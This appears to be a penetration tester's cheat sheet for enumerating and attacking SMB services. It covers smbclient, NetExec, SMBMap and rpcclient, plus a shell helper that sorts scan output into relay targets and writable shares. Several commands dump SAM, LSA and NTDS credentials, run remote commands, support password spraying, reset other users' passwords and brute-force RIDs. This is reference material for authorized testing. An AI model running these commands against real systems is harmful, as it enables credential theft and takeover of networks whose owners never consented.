h4rithd.com | Notes

SMB | 445, 139

SMB is carried either directly over TCP 445 (every dialect since Windows 2000, SMBv1 included) or over the NetBIOS session service on TCP 139 (with NetBIOS name and datagram services on UDP 137/138). A modern host speaking SMBv2/v3 normally exposes only 445; an open 139 means NetBIOS over TCP is still enabled, which usually goes together with legacy SMBv1 support.

00. Basic

  • Find the SMB/Samba version passively: sniff port 139 while another terminal triggers a connection (for example `smbclient -L //$IP`). The SMB1 Session Setup response carries the Samba version in its Native LAN Manager field (UTF-16, hence the `S.a.m.b.a` pattern); SMB2/3 does not send it.

sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139

smbclient -L //$IP
nmap -p 445,139 --script smb-protocols,smb-system-info,smb-os-discovery $IP
enum4linux -a $IP | tee enum4linux_output.txt

01. SMBclient

## ------------------| Enum (list shares; prompts for a password, Enter tries it empty)
smbclient -L //$IP

## ------------------| List all shares (Null session)
smbclient -N -L //$IP

## ------------------| List all shares with credentials
smbclient -L //$IP -U '<username>%<password>'

## ------------------| Connect to the administrative C$ share (needs local admin rights on the target)
smbclient -U '<UserName>%<Password>' //$IP/C$

## ------------------| Connect to a specific share (interactive)
smbclient //$IP/<SHARENAME> -U '<username>%<password>'

## ------------------| Connect to a specific share with NT1 protocol (for older SMB versions)
smbclient -N //$IP/<SHARENAME> --option='client min protocol=NT1'

## ------------------| Download all files
smbclient -N //$IP/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"

## ------------------| Upload a file (inside the smbclient prompt; needs WRITE on the share)
put desktop.ini

## ------------------| List the ACL of a file or directory inside a share
## ACL:Everyone:ALLOWED/OI|CI/FULL means anyone can read and write it (and everything below it)
smbcacls -N //$IP/Department /Users

## ------------------| Connect to a specific share with other protocols
smbclient -L //$IP -U <username> -m SMB2
smbclient -L //$IP -U <username> -m SMB3
smbclient -L //$IP -U <username> -m NT1
02. NetExec (CrackMapExec)

## ------------------| Enumerate hosts
nxc smb 192.168.3.201-203

## ------------------| Tricks
## by default nxc authenticates against the domain the target reports, so a
## local account fails; add --local-auth (or -d WORKGROUP) to log on as a local user

## ------------------| Enumerate shares / Basic info
nxc smb $IP
nxc smb $IP --shares
## null session
nxc smb $IP -u '' -p '' --shares
## guest access: a non-existent user with an empty password (or a hash) is mapped to Guest if it is enabled
nxc smb $IP -u 'DoesNotExist' -p '' --shares
nxc smb $IP -u 'DoesNotExist' -H <NThash>
nxc smb $IP -d WORKGROUP -u 'DoesNotExist' -H <NThash>

## ------------------| Enumerate active sessions
nxc smb $IP -u UserName -p 'Password' --sessions 

## ------------------| Enumerate disks
nxc smb $IP -u UserName -p 'Password' --disks

## ------------------| Enumerate logged on users
nxc smb $IP -u UserName -p 'Password' --loggedon-users

## ------------------| Enumerate domain users
nxc smb $IP -u UserName -p 'Password' --users

## ------------------| Enumerate users by bruteforcing RID
nxc smb $IP -u UserName -p 'Password' --rid-brute

## ------------------| Enumerate domain groups
nxc smb $IP -u UserName -p 'Password' --groups

## ------------------| Enumerate local groups
nxc smb $IP -u UserName -p 'Password' --local-groups

## ------------------| Identify SMB Signing Disabled
nxc smb --gen-relay-list output.txt 10.10.10.0/24

## ------------------| Enumerate password policy
## "Account Lockout Threshold: None" means password spraying cannot lock accounts out;
## otherwise stay below the threshold inside the lockout observation window
nxc smb $IP --pass-pol
nxc smb $IP -u '' -p '' --pass-pol

## ------------------| Dump SAM/LSA/NTDS.dit
nxc smb $IP -u UserName -p 'Password' --sam
nxc smb $IP -u UserName -p 'Password' --lsa
nxc smb $IP -u UserName -p 'Password' --ntds 
nxc smb $IP -u UserName -p 'Password' --ntds vss

## ------------------| Execute commands (needs local admin on the target)
## -X runs the command through PowerShell, -x through cmd.exe; both flags also work with `nxc smb`
## PowerShell
nxc winrm $IP -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
nxc winrm $IP -u melanie -p 'Welcome123!' -x "whoami /all"

## ------------------| Crawling shares
nxc smb $IP -u 'username' -p 'PassW0rd' -M spider_plus 
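On a subnet sweep the `--shares` and `--gen-relay-list` output above is worth triaging automatically. The POSIX shell helper below is an added example (not from these notes and not part of NetExec): it parses saved `nxc smb` output and prints hosts with SMB signing disabled, hosts still negotiating SMBv1, and shares the session can read or write. The sample output, IPs, host names and shares are constructed for the example, and the column layout assumes NetExec's current banner and share-table format.

```shell
#!/bin/sh
# Triage helper for saved `nxc smb ... --shares` output.
# Added example, not part of h4rithd's notes or of NetExec itself.
# Assumes the banner/share line layout shown in NXC_SAMPLE (NetExec 1.x style).
set -u

# Constructed sample of `nxc smb 10.10.10.0/24 -u '' -p '' --shares` output
# (hosts, IPs, shares and remarks are made up for this example).
NXC_SAMPLE='SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\guest:
SMB         10.10.10.5      445    DC01             [*] Enumerated shares
SMB         10.10.10.5      445    DC01             Share           Permissions     Remark
SMB         10.10.10.5      445    DC01             -----           -----------     ------
SMB         10.10.10.5      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.5      445    DC01             C$                              Default share
SMB         10.10.10.5      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.5      445    DC01             Public          READ,WRITE      Drop box for scans
SMB         10.10.10.7      445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.7      445    FS01             [-] corp.local\guest: STATUS_LOGON_FAILURE'

# Hosts whose banner says signing:False -> NTLM relay candidates
# (the same information --gen-relay-list writes to its output file).
relay_targets() { awk '/\(signing:False\)/ { print $2 }'; }

# Hosts that still negotiate SMBv1 -> where `-m NT1` / `client min protocol=NT1` matters.
smbv1_hosts() { awk '/\(SMBv1:True\)/ { print $2 }'; }

# Share rows look like "SMB ip port host share [perms] remark...". A row carries
# permissions only when field 6 is READ, WRITE or READ,WRITE; status lines have
# "[" in field 5 and the header row has "Permissions" in field 6, so both drop out.
# $1 = access wanted: READ (default) or WRITE. Prints "ip share perms".
share_access() {
  want=${1:-READ}
  awk -v want="$want" '
    $5 !~ /^\[/ && $6 ~ /^(READ|WRITE|READ,WRITE)$/ && index($6, want) > 0 {
      print $2, $5, $6
    }'
}

# Demo on the constructed sample. On an engagement pipe the saved file in:
#   nxc smb 10.10.10.0/24 -u '' -p '' --shares | tee nxc_shares.txt
#   share_access WRITE < nxc_shares.txt
echo "## relay targets (signing disabled)"; printf '%s\n' "$NXC_SAMPLE" | relay_targets
echo "## SMBv1 hosts";                      printf '%s\n' "$NXC_SAMPLE" | smbv1_hosts
echo "## writable shares";                  printf '%s\n' "$NXC_SAMPLE" | share_access WRITE
```

`share_access READ` also matches `READ,WRITE` rows, so it lists everything the session can at least read; `IPC$` shows up as readable on almost every host and is usually noise unless you are after named pipes.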

03. SMBMap

## ------------------| General flags
## -H HOST               IP of host
## --host-file FILE      File containing a list of hosts
## -u USERNAME           Username, if omitted null session assumed
## -p PASSWORD           Password or NTLM hash
## --prompt              Prompt for a password
## -s SHARE              Specify a share (default C$), ex 'C$'
## -d DOMAIN             Domain name (default WORKGROUP)
## -P PORT               SMB port (default 445)
## -v                    Return the OS version of the remote host
## -x COMMAND            Execute a command ex. 'ipconfig /all'
## -L                    List all drives on the specified host (requires ADMIN)
## -R [PATH]             Recursively list dirs and files
## -r [PATH]             List contents of directory
## -A PATTERN            Auto-download files whose name matches the regex (use with -R or -r)
## -q                    Quiet: only show shares you can READ/WRITE, hide the file listing when using -A
## -g FILE               Output to a file in a grep friendly format
## --dir-only            List only directories, omit files
## --depth DEPTH         Traverse a directory tree to a specific depth
## --download PATH       Download a file from the remote system, ex. 'C$\temp\passwords.txt'
## --upload SRC DST      Upload a file to the remote system, ex. '/tmp/payload.exe C$\temp\payload.exe'
## --delete PATH         Delete a remote file, ex. 'C$\temp\msf.exe'
## --skip                Skip delete file confirmation prompt

## ------------------| List shares
smbmap -H $IP
smbmap -u 'anonymous' -H $IP
smbmap -u 'anonymous' -p 'anonymous' -H $IP

## ------------------| Recursively list (path is SHARE\directory; without a share prefix smbmap assumes C$)
smbmap -H $IP -r 'SHARE\directory'

## ------------------| Download every file whose name matches a regex while listing (-q hides the listing)
smbmap -H $IP -r 'SHARE\directory' -A 'filename\.txt' -q

04. RPCClient

## ------------------| Login as user (password is prompted, or given after % in the same string)
rpcclient -U 'support' $IP
rpcclient -U 'Administrator%Password' $IP

## ------------------| Null auth (-N suppresses the password prompt)
rpcclient -N -U '' $IP

## ------------------| Enumeration (commands typed at the rpcclient prompt, or passed with -c "...")
lookupnames Guest        ### Resolves the "Guest" name to its SID.
enumdomusers             ### Lists the domain users with their RIDs.
queryuser 0x450          ### Details of the user with RID 0x450 (hex).
enumprinters             ### Lists the printers shared by the server.
srvinfo                  ### Server name, OS version and server type.
enumdomains              ### Lists the domains the server handles (its own plus Builtin).
querydominfo             ### Domain name, number of users and groups, server role.
netshareenumall          ### Lists all shares, including hidden ($) ones, if permitted.
queryuser <RID>          ### Details of a specific user by RID (Relative Identifier).
netsharegetinfo <share>  ### Path, comment and permissions of a specific share.

## ------------------| Change a user's password (needs rights over the account, e.g. GenericAll or
## ForceChangePassword; info level 23 sets the new password without knowing the old one)
setuserinfo2 <UserAccount> 23 '<Password>'

## ------------------| Brute forcing user RIDs over a null session (500-1100 covers the built-in accounts and the first ones created)
for i in $(seq 500 1100); do rpcclient -N -U "" $IP -c "queryuser 0x$(printf '%x' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; done
